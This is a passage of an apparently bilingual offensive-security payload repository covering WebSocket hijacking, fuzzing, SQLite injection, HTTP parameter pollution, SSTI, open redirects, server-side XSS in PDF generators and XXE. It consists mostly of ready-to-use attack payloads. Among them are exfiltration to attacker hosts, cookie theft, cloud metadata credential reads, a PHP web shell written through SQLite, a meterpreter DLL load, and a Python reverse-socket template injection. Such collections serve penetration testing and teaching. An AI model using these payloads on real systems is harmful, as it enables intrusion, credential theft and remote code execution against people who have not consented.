51 | websocket.send("HELLO"); 52 | } 53 | ws.onmessage = function handleReply(event) { 54 | fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'}); 55 | } 56 | ws.send("Some text sent to the server"); 57 | </script> 58 | ``` 59 | 60 | Debe ajustar el código a su situación exacta. Por ejemplo, si su aplicación web utiliza un encabezado `Sec-WebSocket-Protocol` en la solicitud de protocolo de enlace, debe agregar este valor como un segundo parámetro a la llamada `WebSocket` para agregar este encabezado. 61 | -------------------------------------------------------------------------------- /Web Application/Fuzzing/README.md: -------------------------------------------------------------------------------- 1 | # Fuzzing 2 | 3 | ## Summary 4 | - [Lists](#lists) 5 | - [users and passwords](#users-and-passwords) 6 | - [seclist](#seclist) 7 | - [Intruder Attacks](#intruder-attacks) 8 | - [Dirb](#dirb) 9 | - [ffuf](#ffuz) 10 | - [x8](#x8) 11 | 12 | 13 | 14 | ## Lists 15 | 16 | ### Users and Passwords 17 | 18 | https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials 19 | 20 | ### SecList: 21 | 22 | https://github.com/danielmiessler/SecLists 23 | 24 | ### Intruder Attacks 25 | 26 | - Sniper: Utiliza una única lista de carga útil; Reemplaza una posición a la vez; 27 | - Battering RAM: Utiliza una única lista de carga útil; Reemplaza todas las posiciones al mismo tiempo 28 | - Pitchfork: Cada posición tiene una lista de carga útil correspondiente; Entonces si hay dos posiciones a modificar, cada una obtiene su propia lista de carga útil. 29 | - Cluster Bomb: Utiliza cada lista de carga útil y diferentes combinaciones para cada posición. 30 | 31 | ## Dirb 32 | ``` 33 | dirb https://vulnerable.com/ /your/wordlist/path/ 34 | ``` 35 | 36 | ## ffuz 37 | 38 | ### Con extensiones 39 | ```sh 40 | ffuf -w g0ld3n.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp,.php 41 | ``` 42 | 43 | ### Con subdirectorios y una profundidad de 2 subdirectorios para buscar 44 | ```sh 45 | ffuf -w g0ld3n.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp,.php -recursion -recursion-depth 2 46 | ``` 47 | 48 | ### Descubrir subdominios 49 | 50 | Esta herramienta es capaz de encontrar subdominios sin registros DNS a velocidades ultrarrápidas. 51 | 52 | La herramienta utiliza el encabezado de `Host` en una solicitud HTTP para buscar subdominios. 53 | 54 | La bandera `-H` se usa para especificar encabezados de solicitud HTTP. Tenga en cuenta que se permiten varias banderas -H. 55 | ``` 56 | ffuf -w subdomains.txt -u https://vulnerable.com/ -H "Host: FUZZ.vulnerable.com" 57 | ``` 58 | 59 | Si la herramienta proporciona muchos subdominios como salida y la mayoría de ellos no están presentes en la realidad, se pueden utilizar las opciones de filtro que ofrece la herramienta. 60 | 61 | ### Cambio de Método HTTP 62 | ``` 63 | ffuf -w wordlist_api/g0ld3n-api.txt -u https://vulnerable.com/FUZZ -e .txt,.php,.sh,.py,.aspx,.asp -recursion --fw=51 -recursion-depth 2 -H 'Authorization: Bearer JWT' -X POST 64 | ``` 65 | 66 | ### Discover the Parameter of a Shell in WebServer 67 | 68 | ``` 69 | ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://sec03.rentahacker.htb/shell.php?FUZZ=id 70 | ``` 71 | 72 | *Reference by [Scavenger from Hack the Box](#https://0xdf.gitlab.io/2020/02/29/htb-scavenger.html)* 73 | 74 | ### Send Parameter via POST 75 | ``` 76 | ffuf -w g0ld3n-api.txt -u https://vulnerable.com/api/endpoint -X POST --data '{"param1":value1,"param2":value2}' -H 'Authorization: Bearer JWT' 77 | ``` 78 | 79 | ### All Responses Status Code 80 | 81 | Capture all responses, except "403", with `mc` (Match HTTP status codes) command: 82 | 83 | ``` 84 | ffuf -w g0ld3n-api.txt -u https://vulnerable.com/api/endpoint --fc=403 -mc all 85 | ``` 86 | 87 | ## x8 88 | 89 | Send parameters via query 90 | ``` 91 | x8 -u "https://example.com/" -w <wordlist> 92 | ``` 93 | 94 | With some default parameters: 95 | ``` 96 | x8 -u "https://example.com/?something=1" -w <wordlist> 97 | ``` 98 | 99 | `/?something=1` equals to `/?something=1&%s` 100 | 101 | Send parameters via body 102 | ``` 103 | x8 -u "https://example.com/" -X POST --as-body -w <wordlist> 104 | ``` 105 | 106 | Or with a custom body: 107 | ``` 108 | x8 -u "https://example.com/" -X POST --as-body -b '{"x":{%s}}' -w <wordlist> 109 | ``` 110 | 111 | `%s` will be replaced with different parameters like `{"x":{"a":"b3a1a", "b":"ce03a", ...}}` 112 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/SQLite Injection.md: -------------------------------------------------------------------------------- 1 | # SQLite Injection 2 | 3 | ## Summary 4 | 5 | * [SQLite comments](#sqlite-comments) 6 | * [SQLite version](#sqlite-version) 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables) 10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name) 11 | * [Boolean - Extract info](#boolean---extract-info) 12 | * [Extract Password of Current User](#extract-password-of-current-user) 13 | * [Time based](#time-based) 14 | * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) 15 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) 16 | 17 | 18 | ## SQLite comments 19 | 20 | ```sql 21 | -- 22 | /**/ 23 | ``` 24 | 25 | ## SQLite version 26 | 27 | ```sql 28 | select sqlite_version(); 29 | ``` 30 | 31 | ```sql 32 | username=")) UNION+SELECT 1,sqlite_version(),3,4-- 33 | ``` 34 | 35 | ## Integer/String based - Extract table name 36 | 37 | ```sql 38 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 39 | ``` 40 | 41 | ```sql 42 | username=")) UNION SELECT 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- - 43 | ``` 44 | 45 | Use limit X+1 offset X, to extract all tables. 46 | 47 | ## Integer/String based - Extract column name 48 | 49 | ```sql 50 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' 51 | ``` 52 | 53 | ```sql 54 | username=")) UNION SELECT 1,sql,3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='<table>'-- - 55 | ``` 56 | 57 | For a clean output 58 | 59 | ```sql 60 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' 61 | ``` 62 | 63 | ## Boolean - Count number of tables 64 | 65 | ```sql 66 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table 67 | ``` 68 | 69 | ## Boolean - Enumerating table name 70 | 71 | ```sql 72 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number 73 | ``` 74 | 75 | ## Boolean - Extract info 76 | 77 | ```sql 78 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') 79 | ``` 80 | 81 | ## Extract Password of Current User 82 | 83 | ```sql 84 | username="))+union+select+username,+password,+3,+4+from+users+limit+1+-- 85 | ``` 86 | 87 | ## Time based 88 | 89 | ```sql 90 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 91 | ``` 92 | 93 | ## Remote Command Execution using SQLite command - Attach Database 94 | 95 | ```sql 96 | ATTACH DATABASE '/var/www/lol.php' AS lol; 97 | CREATE TABLE lol.pwn (dataz text); 98 | INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');-- 99 | ``` 100 | 101 | ## Remote Command Execution using SQLite command - Load_extension 102 | 103 | ```sql 104 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 105 | ``` 106 | 107 | Note: By default this component is disabled 108 | -------------------------------------------------------------------------------- /Web Application/HTTP Parameter Pollution/README.md: -------------------------------------------------------------------------------- 1 | # HTTP Parameter Pollution 2 | 3 | *** 4 | 5 | ## Summary 6 | 7 | - [Detection](#detection) 8 | - [Server Side HPP](#server-side-hpp) 9 | - [Client Side HPP](#client-side-hpp) 10 | - [Email HPP](#email-hpp) 11 | - [Social Sharing Buttons](#social-sharing-buttons) 12 | 13 | *** 14 | 15 | ## Detection 16 | 17 | In the case that the request contains multiple values for the parameter, you can give three possibilities: 18 | 19 | 1. That the method returns the first value of the parameter. 20 | 2. To return the last. 21 | 3. Or to return a combination of all values. 22 | 23 | The following table illustrates how different web technologies behave in presence of multiple occurrences of the same HTTP parameter. 24 | 25 | Given the URL and querystring: `http://example.com/?color=red&color=blue` 26 | 27 | | Web Application Server Backend | Parsing Result | Example | 28 | | --- | --- | --- | 29 | | ASP.NET / IIS | All occurrences concatenated with a comma | color=red,blue | 30 | | ASP / IIS | All occurrences concatenated with a comma | color=red,blue | 31 | | .NET Core 3.1 / Kestrel | All occurrences concatenated with a comma | color=red,blue | 32 | | .NET 5 / Kestrel | All occurrences concatenated with a comma | color=red,blue | 33 | | PHP / Apache | Last occurrence only | color=blue | 34 | | PHP / Zeus | Last occurrence only | color=blue | 35 | | JSP, Servlet / Apache Tomcat | First occurrence only | color=red | 36 | | JSP, Servlet / Oracle Application Server 10g | First occurrence only | color=red | 37 | | JSP, Servlet / Jetty | First occurrence only | color=red | 38 | | IBM Lotus Domino | Last occurrence only | color=blue | 39 | | IBM HTTP Server | First occurrence only | color=red | 40 | | node.js / express | First occurence only | color=red | 41 | | mod_perl, libapreq2 / Apache | First occurrence only | color=red | 42 | | Perl CGI / Apache | First occurrence only | color=red | 43 | | mod_wsgi (Python) / Apache | First occurrence only | color=red | 44 | | Python / Zope | All occurrences in List data type | color=\[‘red’,’blue’\] | 45 | 46 | *** 47 | 48 | ## Server Side HPP 49 | 50 | An attacker could try to add another `from` parameter to trick the server, and in that case, this parameter would transact from one account to another that is not owned by the attacker. 51 | 52 | Normal: 53 | ``` 54 | https://example.com/transfer?from=1377&to=1234&amount=5000 55 | ``` 56 | 57 | Exploited: 58 | ``` 59 | https://example.com/transfer?from=1377&to=1234&amount=5000&from=1338 60 | ``` 61 | 62 | *** 63 | 64 | ## Client Side HPP 65 | 66 | An attacker could add other "candidate" param and send this to the victim. When the victim open the URL, it won't matter what your vote, this will be always "green" vote. 67 | 68 | Normal: 69 | 70 | ``` 71 | http://example.com/votation?candidate=green&vote=1 72 | ``` 73 | 74 | Exploited: 75 | 76 | ``` 77 | http://example.com/votation?candidate=green&vote=1%26candidate=black 78 | ``` 79 | 80 | ### Email HPP 81 | 82 | ``` 83 | email=victim@example.com&email=attacker@example.com 84 | ``` 85 | 86 | ### Social Sharing Buttons 87 | 88 | Find a article or blog present on target website which must have a link to share that blog on different social networks such as Facebook, Twitter, etc. 89 | 90 | Let's say we got and article with url: 91 | ``` 92 | https://vulnerable.com/blog/my-poc-hpp 93 | ``` 94 | 95 | Then just appened it with payload: 96 | ``` 97 | ?&u=https://[attacker.com]/ok&text=another_site:https://[attacker.com]/ok 98 | ``` 99 | 100 | So our URL will become: 101 | ``` 102 | https://vulnerable.com/blog/my-poc-hpp?&u=https://[attacker.com]/ok&text=another_site:https://[attacker.com]/ok 103 | ``` 104 | 105 | Now hit enter with the abover URL and click on share with social media. Just observe the content if it is including our payload `https://[attacker.com]/`. 106 | 107 | If you send a link to the user and he wants to share a link to facebook, the content will change. 108 | 109 | -------------------------------------------------------------------------------- /Web Application/SSTI/Intruder/ssti.fuzz.txt: -------------------------------------------------------------------------------- 1 | ${{<%[%'"}}%\ 2 | <%=+7*7+%> 3 | <%25%3d+7*7+%25> 4 | ${7*7} 5 | {{7*7}} 6 | parameter=user.first_name}}{{7*7}} 7 | {%+debug%} 8 | {%25+debug+%25} 9 | #{1+1} 10 | {{7*'7'}} 11 | ${3*3} 12 | {{ someString.toUPPERCASE() }} 13 | [[5*5]] 14 | {{'a'.toUpperCase()}} 15 | @(1+2) 16 | {{4*4}}[[5*5]] 17 | {{7*7}} 18 | {{7*'7'}} 19 | <%= 7 * 7 %> 20 | ${3*3} 21 | ${{7*7}} 22 | @(1+2) 23 | #{3*3} 24 | #{ 7 * 7 } 25 | {{dump(app)}} 26 | {{app.request.server.all|join(',')}} 27 | {{config.items()}} 28 | {{ [].class.base.subclasses() }} 29 | {{''.class.mro()[1].subclasses()}} 30 | {{ ''.__class__.__mro__[2].__subclasses__() }} 31 | {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %} 32 | {{'a'.toUpperCase()}} 33 | {{ request }} 34 | {{self}} 35 | <%= File.open('/etc/passwd').read %> 36 | <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} 37 | [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} 38 | ${"freemarker.template.utility.Execute"?new()("id")} 39 | {{app.request.query.filter(0,0,1024,{'options':'system'})}} 40 | {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 41 | {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} 42 | {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} 43 | {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 44 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} 45 | {$smarty.version} 46 | {php}echo `id`;{/php} 47 | {{['id']|filter('system')}} 48 | {{['cat\x20/etc/passwd']|filter('system')}} 49 | {{['cat$IFS/etc/passwd']|filter('system')}} 50 | {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} 51 | {{request|attr(["_"*2,"class","_"*2]|join)}} 52 | {{request|attr(["__","class","__"]|join)}} 53 | {{request|attr("__class__")}} 54 | {{request.__class__}} 55 | {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} 56 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} 57 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} 58 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 59 | {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} 60 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} 61 | ${T(java.lang.System).getenv()} 62 | ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} 63 | ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} -------------------------------------------------------------------------------- /Web Application/Open Redirect/README.md: -------------------------------------------------------------------------------- 1 | # Open Redirect 2 | 3 | Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. 4 | 5 | *** 6 | 7 | ## Summary 8 | - [30X HTTP Status](#) 9 | - [Detection](#detection) 10 | - [Open Redirect to XSS](#open-redirect-to-xss) 11 | - [Vulnerable Params](#vulnerable-params) 12 | 13 | *** 14 | 15 | ## 30X HTTP Status 16 | 17 | - [300 Multiple Choices](https://httpstatuses.com/300) 18 | - [301 Moved Permanently](https://httpstatuses.com/301) 19 | - [302 Found](https://httpstatuses.com/302) 20 | - [303 See Other](https://httpstatuses.com/303) 21 | - [304 Not Modified](https://httpstatuses.com/304) 22 | - [305 Use Proxy](https://httpstatuses.com/305) 23 | - [307 Temporary Redirect](https://httpstatuses.com/307) 24 | - [308 Permanent Redirect](https://httpstatuses.com/308) 25 | 26 | *** 27 | 28 | ## Detection 29 | 30 | ``` 31 | https://vulnerable.com/signup?redirectUrl=https://attacker.com/account 32 | ``` 33 | ``` 34 | http://vulnerable.com//bing.com 35 | ``` 36 | ``` 37 | http://vulnerable.com//www.bing.com 38 | ``` 39 | ``` 40 | http://vulnerable.com//bing.com/%2e%2e 41 | ``` 42 | ``` 43 | http://vulnerable.com/auth/login?redirect=/%5Cbing.com 44 | ``` 45 | ``` 46 | https://www.vulnerable.com.attacker.com/ 47 | www.vulnerable.com.attacker.com/ 48 | ``` 49 | ``` 50 | https:bing.com 51 | ``` 52 | ``` 53 | https://vulnerable.com\/\/google.com/ 54 | https://vulnerable.com/\/google.com/ 55 | ``` 56 | ``` 57 | https://vulnerable.com/?redirectUrl=\/\/google.com/ 58 | https://vulnerable.com/?redirectUrl=\/google.com/ 59 | ``` 60 | ``` 61 | https://vulnerable.com/?redirect=google。com 62 | ``` 63 | ``` 64 | https://vulnerable.com//google%E3%80%82com 65 | ``` 66 | ``` 67 | https://vulnerable.com//google%00.com 68 | ``` 69 | ``` 70 | https://vulnerable.com/?next=whitelisted.com&next=google.com 71 | ``` 72 | ``` 73 | http://www.vulnerable.com@bing.com/ 74 | ``` 75 | ``` 76 | http://www.vulnerable.com?http://www.bing.com/ 77 | http://www.vulnerable.com?folder/www.bing.com 78 | ``` 79 | ``` 80 | https://attacker.c℀.vulnerable.com . ---> https://attacker.ca/c.vulnerable.com 81 | ``` 82 | 83 | *** 84 | 85 | ## Open Redirect to XSS 86 | 87 | ### If it's in a JS variable: 88 | 89 | ``` 90 | ";alert(0);// 91 | ``` 92 | 93 | ### From `data://` wrapper: 94 | 95 | ``` 96 | http://www.vulnerable.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== 97 | ``` 98 | 99 | ### From `javascript://` wrapper: 100 | 101 | ``` 102 | http://www.vulnerable.com/redirect.php?url=javascript:prompt(1) 103 | ``` 104 | 105 | *** 106 | 107 | ## Vulnerable Params 108 | 109 | Replace `replaceme.com` from *openRedirectPayloads.txt* with a specific white listed domain in your test case. 110 | ``` 111 | sed 's/replaceme.com/[yourVictimOrDomain].com/' openRedirectPayloads.txt > [vulnerable].txt 112 | ``` 113 | 114 | Mirar las peticiones 3XX en BurpSuite: 115 | 116 | ``` 117 | /{payload} 118 | ?next={payload} 119 | ?target={payload} 120 | ?rurl={payload} 121 | ?dest={payload} 122 | ?destination={payload} 123 | ?redir={payload} 124 | ?redirect_uri={payload} 125 | ?redirect_url={payload} 126 | ?redirect={payload} 127 | /redirect/{payload} 128 | /cgi-bin/redirect.cgi?{payload} 129 | /out/{payload} 130 | /out?{payload} 131 | ?view={payload} 132 | /login?to={payload} 133 | ?image_url={payload} 134 | ?go={payload} 135 | ?return={payload} 136 | ?returnTo={payload} 137 | ?return_to={payload} 138 | ?checkout_url={payload} 139 | ?continue={payload} 140 | ?return_path={payload} 141 | ``` 142 | 143 | Add `http://example.com/{payloads}` or `http://example.com/?paramPotentialVuln={payloads}` and with `Intruder` + `payloads.txt` test the OpenRedirection. 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/server-side-xss-dynamic-pdf.md: -------------------------------------------------------------------------------- 1 | # Server Side XSS $Dynamic PDF$ 2 | 3 | ## Server Side XSS $Dynamic PDF$ 4 | 5 | If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**. 6 | So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**. 7 | 8 | Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS $for example, abusing `<img` $. 9 | Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** $using `document.write()` for example$. But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** $Blind$. 10 | 11 | ## Payloads 12 | 13 | ### Discovery 14 | 15 | ```markup 16 |  17 | <img src="x" onerror="document.write('test')" /> 18 | 19 |  20 | <img src="http://attacker.com"/> 21 | <img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie"> 22 | <script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script> 23 | <link rel=attachment href="http://attacker.com"> 24 | ``` 25 | 26 | ### Path disclosure 27 | 28 | ```markup 29 |  31 | <img src="x" onerror="document.write(window.location)" /> 32 | <script> document.write(window.location) </script> 33 | ``` 34 | 35 | ### Load an external script 36 | 37 | The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time. 38 | 39 | ```markup 40 | <script src="http://attacker.com/myscripts.js"></script> 41 | <img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/> 42 | ``` 43 | 44 | ### Read local file 45 | 46 | ```markup 47 | <script> 48 | x=new XMLHttpRequest; 49 | x.onload=function(){document.write(btoa(this.responseText))}; 50 | x.open("GET","file:///etc/passwd");x.send(); 51 | </script> 52 | ``` 53 | 54 | ```markup 55 | <iframe src=file:///etc/passwd></iframe> 56 | <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> 57 | <link rel=attachment href="file:///root/secret.txt"> 58 | <object data="file:///etc/passwd"> 59 | <portal src="file:///etc/passwd" id=portal> 60 | ``` 61 | 62 | ### Get external web page response as attachment $metadata endpoints$ 63 | 64 | ```markup 65 | <link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/"> 66 | ``` 67 | 68 | ### Bot delay 69 | 70 | ```markup 71 |  72 | <script> 73 | let time = 500; 74 | setInterval(()=>{ 75 | let img = document.createElement("img"); 76 | img.src = `https://attacker.com/ping?time=${time}ms`; 77 | time += 500; 78 | }, 500); 79 | </script> 80 | <img src="https://attacker.com/delay"> 81 | ``` 82 | 83 | ### Port Scan 84 | 85 | ```markup 86 |  87 | <script> 88 | const checkPort = (port) => { 89 | fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => { 90 | let img = document.createElement("img"); 91 | img.src = `http://attacker.com/ping?port=${port}`; 92 | }); 93 | } 94 | 95 | for(let i=0; i<1000; i++) { 96 | checkPort(i); 97 | } 98 | </script> 99 | <img src="https://attacker.com/startingScan"> 100 | ``` 101 | 102 | ### [SSRF](../SSRF/README.md) 103 | 104 | This vulnerability can be transformed very easily in a SSRF $as you can make the script load external resources$. So just try to exploit it $read some metadata?$. 105 | 106 | ## References 107 | 108 | {% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %} 109 | 110 | {% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %} 111 | 112 | {% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %} 113 | -------------------------------------------------------------------------------- /Web Application/XXE/Intruder/XXE_Fuzzing.txt: -------------------------------------------------------------------------------- 1 | <?xml version="1.0" encoding="ISO-8859-1"?> 2 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 3 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 4 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 12 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 13 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 14 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 15 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 16 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 17 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 18 | <test></test> 19 | <![CDATA[<test></test>]]> 20 | &foo; 21 | %foo; 22 | count(/child::node()) 23 | x' or name()='username' or 'x'='y 24 | <name>','')); phpinfo(); exit;/*</name> 25 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 26 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 27 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 28 | <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 30 | <foo><![CDATA[' or 1=1 or ''=']]></foo> 31 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 32 | <xml ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 33 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <xml SRC="xsstest.xml" ID=I></xml> 36 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 37 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 38 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template 